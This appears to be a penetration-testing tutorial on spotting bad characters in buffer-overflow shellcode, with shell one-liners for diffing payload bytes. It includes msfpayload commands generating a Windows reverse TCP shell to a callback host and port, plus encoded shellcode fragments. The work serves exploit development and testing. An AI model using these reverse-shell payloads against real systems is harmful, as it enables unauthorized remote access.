When testing or developing a custom buffer-overflow as a proof of concept, it is often useful to use shellcode to get a command shell.
However, as shellcode payloads are generally binary in nature, they can get corrupted in transit. This is because the transmission protocol, the end application, or both can be sensitive to "bad characters", which can break your shellcode in various ways.
Essentially, many protocols are text based, and non-text characters in the data-stream can either break the transmission (by having a special meaning) or get filtered out.
Shellcode corruption problems
Corruption problems can include payload truncation, character substitution, missing characters, extra characters, or any combination of these. The buffer-overflow condition may even fail to trigger at all once the shellcode has been introduced to the exploit. It all depends on the shellcode payload, the protocol, application filtering, and the application itself.
So, how can you spot bad characters, and fix the problem, without going through every character in the payload and comparing it to what you received on the other end?
Having done lots of troubleshooting of this situation recently, I thought I would share a solution I found for comparing shellcode before and after transmission. The payload examples I use are from Metasploit, and I will be looking at the results in OllyDbg, but the concepts are transferable.
Shellcode generation
Metasploit's msfpayload is a great tool for generating payloads.
msfpayload will generate the hex codes of a defined payload, ready for an exploit developer to cut and paste directly into their proof-of-concept exploit.
Payloads are generally of the form:
/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.65 LPORT=443 C
/*
* windows/shell_reverse_tcp - 314 bytes
* http://www.metasploit.com
* AutoRunScript=, LHOST=192.168.1.65, EXITFUNC=process,
* InitialAutoRunScript=, LPORT=443, ReverseConnectRetries=5
*/
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02....
Note that the number of bytes per line is variable, and can be around 14 or 15 (I am not sure why they did this; a fixed 16 would have made more sense to me).
As you may also notice above, there are some \x00 characters in that example, which are often a source of problems, as this character is used as a string terminator in many protocols and applications.
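A quick way to check a generated payload for a suspected badchar before sending it is to count how often that byte appears in the dump. The following is only a sketch: the function name count_byte is made up for this example, and it assumes the payload is in the "\x.." text format shown above.

```shell
# count_byte HEX FILE
# Count how often one byte (two hex digits, e.g. 00) appears in a
# Metasploit-style "\x.." dump. The function name is illustrative.
count_byte() {
    # grep -o prints every match on its own line; wc -l counts them.
    grep -o -i "\\\\x$1" "$2" | wc -l | tr -d ' '
}

# Try it on the first line of the payload shown above.
sample=$(mktemp)
cat > "$sample" <<'EOF'
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
EOF
count_byte 00 "$sample"    # prints 3
rm -f "$sample"
```

A count of zero for every suspected badchar is what you want to see before the payload goes into the exploit.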
Eliminating bad characters
Badchars can mostly be eliminated by encoding the payload.
In the following example, I output a payload to a file in a raw format, and then encode that file, producing a payload that does not contain the badchar "\x00".
/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.1.65 LPORT=443 R > reverseshell
/pentest/exploits/framework3/msfencode -i reverseshell -b "\x00"
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
buf =
"\xbb\xf6\xee\x65\x0a\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x4f\x31\x5a\x14\x83\xc2\x04\x03\x5a\x10\x14\x1b\x99" +
"\xe2\x51\xe4\x62\xf3\x01....
(The above two-stage "saving to a file" method is quite useful, as you can quickly produce multiple copies of the same payload in various encoding formats, for testing purposes)
When the encoded payload runs in an exploit, it will unpack itself in memory, recreating the original binary payload, and then run, giving you the command shell.
So, how do you know which characters are badchars?
For most text-based protocols, "\x00", "\x0a" and "\x0d" are a safe bet to be badchars, but there may be many others that will break your shellcode. How can you tell what these are?
During exploit development, you can usually look at the shellcode in memory, when the buffer overflow occurs, perhaps by setting a breakpoint in a debugger, and then compare the shellcode in memory, to what you sent.
This can show you if the shellcode is truncated, or has missing or substituted characters.
Comparison difficulties
However, if you are using Metasploit and OllyDbg, for example, you will end up with two very different formats:
This is the format of the shellcode in your exploit, from Metasploit:
"\xda\xd1\xbb\xfa\x3a\xcd\x45\xd9\x74\x24\xf4\x5f\x2b\xc9" +
"\xb1\x4f\x83\xef\xfc\x31\x5f\x15\x03\x5f\x15\x18\xcf\x31" +
"\xad\x55\x30\xca\x2e\x05\xb8\x2f\x1f\x17\xde\x24\x32\xa7" +
"\x94\x69\xbf\x4c\xf8\x99\x34\x20\xd5\xae\xfd\x8e\x03\x80" +
"\xfe\x3f\x8c\x4e\x3c\x5e\x70\x8d\x11\x80\x49\x5e\x64\xc1" +
"\x8e\x83\x87\x93\x47\xcf\x3a\x03\xe3\x8d\x86\x22\x23\x9a" +
"\xb7\x5c\x46\x5d\x43\xd6\x49\x8e\xfc\x6d\x01\x36\x76\x29" +
"\xb2\x47\x5b\x2a\x8e\x0e\xd0\x98\x64\x91\x30\xd1\x85\xa3" +
"\x7c\xbd\xbb\x0b\x71\xbc\xfc....
This is a cut'n'paste, of the same thing, out of the dump area in OllyDbg:
00C8FDB8 DA D1 BB FA 3A CD 45 D9 74 24 F4 5F 2B C9 B1 4F ÚÑ»ú:ÍEÙt$ô_+ɱO
00C8FDC8 83 EF FC 31 5F 15 03 5F 15 18 CF 31 AD 55 30 CA ?ïü1_ _ Ï1U0Ê
00C8FDD8 2E 05 B8 5C 1F 17 DE 24 32 A7 94 69 BF 4C F8 99 . ¸\ Þ$2§?i¿Lø?
00C8FDE8 34 20 D5 AE FD 8E 03 80 FE 3F 8C 4E 3C 5E 70 8D 4 Õ®ý? ?þ??N<^p
00C8FDF8 11 80 49 5E 64 C1 8E 83 87 93 47 CF 3A 03 E3 8D ?I^dÁ????GÏ: ã
00C8FE08 86 22 23 9A B7 5C 46 5D 43 D6 49 8E FC 6D 01 36 ?"#?·\F]CÖI?üm 6
00C8FE18 76 29 B2 47 5B 2A 8E 0E D0 98 64 91 30 D1 85 A3 v)²G[*? Ð?d?0Ñ?£
00C8FE28 7C BD BB 0B 71 BC FC AC....
You may think, "Ok, I will just look through the payload byte-by-byte, and see what the differences are".
Unless you are a robot, or a savant, you can hardly scan through these quickly and spot the difference.
And whilst you may try the manual process once or twice, it is just not scalable for payloads of 350 to 750 bytes. This is especially true if you need to do it multiple times, which is often the case in exploit development.
There are several solutions to this. Here is mine...
Use cut, tr, and diff to compare the shellcode
So, what we are going to do here, is put the before and after shellcode in separate files, get them in the same format, and then use the diff command to compare them and see where the differences are.
Diff compares lines, so ideally we want to turn the payloads into files with one character per line, in the same format, so that we can do a...
diff file1.txt file2.txt
... and it will show us the characters which are different.
Here is the commandline kung-fu that I came up with to do this task (you may need to tweak this for your own environment)
Kung-fu
First we have two files, presend.txt and postsend.txt, containing the before and after shellcode.
presend.txt is in the Metasploit format. postsend.txt is in the OllyDbg format.
cat presend.txt | tr -d "x",'"',"+","\n"," " | tr "\\" "\n" > preoneperline.txt
cat postsend.txt | cut -d" " -f2-18 | tr -d "\n" | tr "A-F" "a-f" | tr " " "\n" > postoneperline.txt
diff postoneperline.txt preoneperline.txt
This should then point you to the differences between the payloads.
Explanation of the Kung-fu
So, for the Metasploit-style format, we remove the x, ", +, space and newline characters, and replace every \ with a newline.
For the debugger format, we keep only the middle section (the hex bytes), remove the newlines, make all the hex lowercase, and convert spaces to newlines.
The diff command shows the lines which differ between the two files. As we now have one byte on each line, this is a byte-by-byte comparison.
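If you do this often, the same idea can be wrapped in a small script that also reports the byte offset of each difference. This is a rough sketch rather than a drop-in tool: the function names are invented for this example, and it assumes the two dump formats shown earlier (an address followed by up to 16 hex pairs per line on the debugger side).

```shell
# Sketch only: function names are made up for this example.

# Metasploit-style dump -> one lowercase hex byte per line.
msf_to_lines() {
    grep -o -i '\\x[0-9a-f][0-9a-f]' "$1" | cut -c3- | tr 'A-F' 'a-f'
}

# OllyDbg-style dump -> one lowercase hex byte per line.
# Field 1 is the address; up to 16 two-digit hex fields follow it.
# Stops at the first field that is not a hex pair (the ASCII column).
olly_to_lines() {
    awk '{
        n = 0
        for (i = 2; i <= NF && n < 16; i++) {
            if ($i !~ /^[0-9A-Fa-f][0-9A-Fa-f]$/) break
            print tolower($i)
            n++
        }
    }' "$1"
}

# Print every position where the sent and received bytes differ.
compare_dumps() {
    sent=$(mktemp)
    received=$(mktemp)
    msf_to_lines "$1" > "$sent"
    olly_to_lines "$2" > "$received"
    # paste puts byte N of each file side by side, separated by a tab.
    # Appending "" forces awk to compare the fields as strings.
    paste "$sent" "$received" | awk -F'\t' '($1 "") != ($2 "") {
        printf "offset %d: sent %s, received %s\n", NR - 1,
            ($1 == "" ? "--" : $1), ($2 == "" ? "--" : $2)
    }'
    rm -f "$sent" "$received"
}

# Usage: sh compare.sh presend.txt postsend.txt
if [ "$#" -eq 2 ]; then
    compare_dumps "$1" "$2"
fi
```

Note that paste compares position by position, so it suits substituted bytes. If a byte is missing or an extra one has been inserted, everything after it will be reported as different, and diff on the two one-per-line files will give a more readable picture.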
The remedy
Once you have found all the badchars, you can then exclude them when encoding the payload. For example:
/pentest/exploits/framework3/msfencode -i reverseshell -b "\x00\x0a\x0d\x2f"
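When the list of badchars keeps growing during testing, typing the escaped string by hand gets error-prone. As a small convenience, the sketch below turns a list of hex values into the "\x.." form used with -b above. The function name badchars_arg is hypothetical and not part of Metasploit.

```shell
# badchars_arg HEX [HEX...]
# Turn hex byte values (e.g. 00 0a 0d 2f) into the escaped string
# form used with msfencode -b above. The name is illustrative.
badchars_arg() {
    for b in "$@"; do
        # '\\x%s' prints a literal backslash, an x, then the value.
        printf '\\x%s' "$b"
    done
    printf '\n'
}

badchars_arg 00 0a 0d 2f    # prints \x00\x0a\x0d\x2f
```

The output can then be pasted between the quotes of the -b option.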
Encoding as (almost all) text
The following example is a catch-all that will work around most situations, but it makes the payload rather large (around 700 bytes for a 350-byte payload).
/pentest/exploits/framework3/msfencode -i reverseshell -e x86/alpha_mixed
[*] x86/alpha_mixed succeeded with size 690 (iteration=1)
buf =
"\x89\xe7\xda\xd6\xd9\x77\xf4\x5b\x53\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x4b\x4c\x49\x78\x4c\x49\x47\x70\x47\x70" +
"\x43\x30\x45\x30\x4c\x49\x4d\x35\x54\x71\x4b\x62\x50\x64" +
"\x4e\x6b\x52\x72\x54\x70\x4c\x4b\x56\x32\x54\x4c\x4c\x4b" +
"\x50\x52\x47\x64\x4c\x4b\x50\x72\x54\x68\x56\x6f\x4d\x67" +
"\x51\x5a\x56\x46\x54\x71\x49...
There is one issue here: a few bytes at the beginning are not alphanumeric, namely "\x89\xe7\xda\xd6\xd9", "\xf4" and "\x5b", which is rather unfortunate for this payload.
There are further ways to avoid these, but that is a more complex issue, perhaps for another time...
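To see exactly which bytes of an encoded payload fall outside the alphanumeric range, something like the following can help. It is a sketch under the same assumptions as before (payload saved in the "\x.." text format), and the function name non_alnum_bytes is made up for this example.

```shell
# non_alnum_bytes FILE
# List the offset and value of every byte in a "\x.." dump that is
# not an ASCII letter or digit. The function name is illustrative.
non_alnum_bytes() {
    grep -o -i '\\x[0-9a-f][0-9a-f]' "$1" | cut -c3- | tr 'A-F' 'a-f' |
        # Alphanumeric ASCII is 30-39 (0-9), 41-5a (A-Z), 61-7a (a-z).
        awk '$0 !~ /^(3[0-9]|4[1-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a])$/ {
            printf "offset %d: %s\n", NR - 1, $0
        }'
}

# Usage: sh nonalnum.sh encoded_payload.txt
if [ "$#" -eq 1 ]; then
    non_alnum_bytes "$1"
fi
```

Run against the first line of the alpha_mixed output above, it reports 89, e7, da, d6, d9, f4 and 5b, all within the first eight bytes.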